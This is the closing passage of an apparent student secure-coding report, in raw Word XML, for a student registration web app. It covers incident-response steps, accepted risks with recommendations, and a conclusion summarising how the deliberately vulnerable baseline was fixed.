          <w:bCs/>
        </w:rPr>
        <w:t>8.3 Suspected SSRF Attempt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3940BB18" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Detected via ssrf_blocked events or u</w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>nexpected outbound connections from the application server to internal/link-local/metadata addresses in network logs. If UrlGuard correctly rejected the request (the expected outcome), no further action is needed beyond logging; if an outbound connection i</w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>s nonetheless observed, the link-preview feature is disabled immediately pending review of the allowlist and the guard logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03565439" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00754396" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="120"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00754396">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8.4 Suspected Account Compromise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E9D3A5" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Detected via an unusual login pattern immediately following a failed-login burst, or a user repor</w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ting activity they didn't perform. The account's session is force-expired and the account locked pending user contact; a password reset is required through the existing single-use, hashed, time-limited token flow before the account is unlocked.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2269189E" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="320" w:after="160"/>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:t>9. Limitati</w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:t>ons and Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E2174D" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>This assignment implements the controls required by the brief within a deliberately bounded scope. The following gaps are documented as accepted risks (Section 6, R12–R14) rather than silently omitted:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A4BDC3" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>No multi-factor authentication</w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: a leaked password alone is currently sufficient for account takeover. Recommendation: add TOTP-based MFA, at minimum for administrator accounts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B10C50C" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>No Web Application Firewall or network-level DDoS protection: the application's own rate limiting and upload-</w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>size caps provide only application-layer mitigation. Recommendation: place the application behind a WAF/CDN in any real deployment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6423B8" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>No automated dependency or static-analysis scanning: all secure-coding review in this assignment was manual. Recommendation:</w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> integrate a SAST tool or dependency-audit step into a CI pipeline before any production use.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45BB12D3" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>No CAPTCHA or proof-of-work challenge on repeated login failures, beyond the rate limiting and lockout already implemented. Recommendation: add one as an addition</w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>al layer for internet-facing deployments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34CDFF58" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>This report and codebase have not been through an independent, live penetration test; the vulnerable-baseline files are illustrative of the specific findings named above, not an exhaustive audit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC9B2E0" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="320" w:after="160"/>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:t>10. Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE02866" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Student Registration application was built with a deliberately vulnerable baseline for each required finding — SQL injection in the login and admin-search queries, stored XSS in the profile bio field, CSRF on state-changing forms, SSRF in the link-preview</w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> feature, broken access control on the admin area, and weak (MD5, unlimited-attempt) authentication — and then systematically remediated: parameterised queries throughout, output encoding paired with a restrictive CSP, per-session CSRF tokens, an SSRF allo</w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>wlist with resolved-IP and redirect checks, server-side role enforcement, and Argon2id hashing with rate limiting, lockout and session regeneration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7A8F8C" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The STRIDE threat model (Section 3) and risk register (Section 6) show every in-scope threat reduced from a</w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Likelihood×Impact score of 4–19 down to 1–3, with the three explicitly out-of-scope risks (MFA, WAF/DDoS, automated scanning) carried forward as accepted risks with concrete recommendations rather than left unaddressed. Structured, redacted security-event</w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> logging and an incident-response runbook complete the defensive picture, giving the application both preventive controls and a documented response process for when those controls are tested in practice.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="007B5C98" w:rsidRPr="00267CC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6F9ABA" w14:textId="77777777" w:rsidR="00203D5A" w:rsidRDefault="00203D5A">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="1E9A09EF" w14:textId="77777777" w:rsidR="00203D5A" w:rsidRDefault="00203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94B20" w14:textId="5E92939B" w:rsidR="007B5C98" w:rsidRDefault="00203D5A">
    <w:pPr>
      <w:jc w:val="center"/>
    </w:pP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AA23CB">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404E9A" w14:textId="77777777" w:rsidR="00203D5A" w:rsidRDefault="00203D5A">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="1E7B4E17" w14:textId="77777777" w:rsidR="00203D5A" w:rsidRDefault="00203D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AC756" w14:textId="64D1245B" w:rsidR="007B5C98" w:rsidRDefault="007B5C98">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4453D7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="44EC81E2"/>
    <w:lvl w:ilvl="0" w:tplc="59B626E2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="431" w:hanging="215"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="15B65046">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="DE8C2D52">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="F028BFBA">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="DC5C6954">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="1E4E1B80">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="3E6C320E">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="8DC8A646">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="4CEEACAC">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="687F0B06"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4D46049A"/>
    <w:lvl w:ilvl="0" w:tplc="02C23FB6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="B4468AAC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="7F66D446">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="1D4A013C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="C4BE5CD4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="B74A2BA4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="9EEC312C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="EA4AC09E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="E9C6D80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C98"/>
    <w:rsid w:val="00017F94"/>
    <w:rsid w:val="000D0F6F"/>
    <w:rsid w:val="0010598A"/>
    <w:rsid w:val="001126E1"/>
    <w:rsid w:val="00203D5A"/>
    <w:rsid w:val="00250970"/>
    <w:rsid w:val="00267CCC"/>
    <w:rsid w:val="003D17B3"/>
    <w:rsid w:val="00430655"/>
    <w:rsid w:val="005830C1"/>
    <w:rsid w:val="006E1ABD"/>
    <w:rsid w:val="00754396"/>
    <w:rsid w:val="007B5C98"/>
    <w:rsid w:val="00876FBF"/>
    <w:rsid w:val="00935D26"/>
    <w:rsid w:val="009B7F11"/>
    <w:rsid w:val="009F728F"/>
    <w:rsid w:val="00A54A5B"/>
    <w:rsid w:val="00AA23CB"/>
    <w:rsid w:val="00BA7C5E"/>
    <w:rsid w:val="00C24232"/>
    <w:rsid w:val="00CB2FED"/>
    <w:rsid w:val="00D21512"/>
    <w:rsid w:val="00D7635C"/>
    <w:rsid w:val="00E3370E"/>
    <w:rsid w:val="00F411AC"/>
    <w:rsid w:val="00F735E5"/>
    <w:rsid w:val="00FA5D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A1D9"/>
  <w15:docId w15:val="{44553EEA-5172-4FB6-948A-1EA05CCF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rsid w:val="00017F94"/>
    <w:pPr>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00017F94"/>
    <w:pPr>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="000000" w:themeColor="text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7CCC"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4513"/>
        <w:tab w:val="right" w:pos="9026"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HeaderChar">
    <w:name w:val="Header Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Header"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00267CCC"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00267CCC"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4513"/>
        <w:tab w:val="right" w:pos="9026"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FooterChar">
    <w:name w:val="Footer Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Footer"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00267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3822</Words>
  <Characters>21787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DELL</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-08-17T10:02:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-08-17T10:02:00Z</dcterms:modified>
</cp:coreProperties>
</file>